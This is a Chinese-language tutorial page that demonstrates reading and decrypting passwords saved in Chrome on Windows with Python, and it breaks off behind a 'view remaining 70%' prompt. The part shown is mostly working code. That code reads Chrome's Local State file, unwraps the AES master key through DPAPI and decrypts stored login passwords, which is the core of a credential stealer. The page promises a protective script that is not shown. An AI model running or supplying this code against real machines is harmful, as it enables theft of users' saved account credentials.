chrome浏览器是用户非常喜欢的一款浏览器,用户也经常将网站的一些登录账号及密码保存在chrome里,下次登录表单自动填充,不用再重新输入,但是你知道吗,在chrome上保存的账号密码可以通过python读取,下面我们来演示一下。
由于Chrome将大量浏览数据保存在本地磁盘中,因此在本教程中,我们将编写Python代码以提取Windows计算机上Chrome中保存的密码,我们还将制作一个快速脚本来保护自己免受此类攻击。
一、读取chrome密码
首先,让我们安装所需的库:pip3 install pycryptodome pypiwin32
打开一个新的Python文件,并导入必要的模块:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil from datetime import timezone, datetime, timedelta
在直接提取Chrome密码之前,我们需要定义一些有用的功能,这些功能将在主要功能之外为我们提供帮助:
def get_chrome_datetime(chromedate):
"""Return a `datetime.datetime` object from a chrome format datetime
Since `chromedate` is formatted as the number of microseconds since January, 1601"""
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
# decode the encryption key from Base64
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
# remove DPAPI str
key = key[5:]
# return decrypted key that was originally encrypted
# using a session key derived from current user's logon credentials
# doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
# get the initialization vector
iv = password[3:15]
password = password[15:]
# generate cipher
cipher = AES.new(key, AES.MODE_GCM, iv)
# decrypt password
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
# not supported
return ""
点击查看剩余70%
{{collectdata}}
网友评论0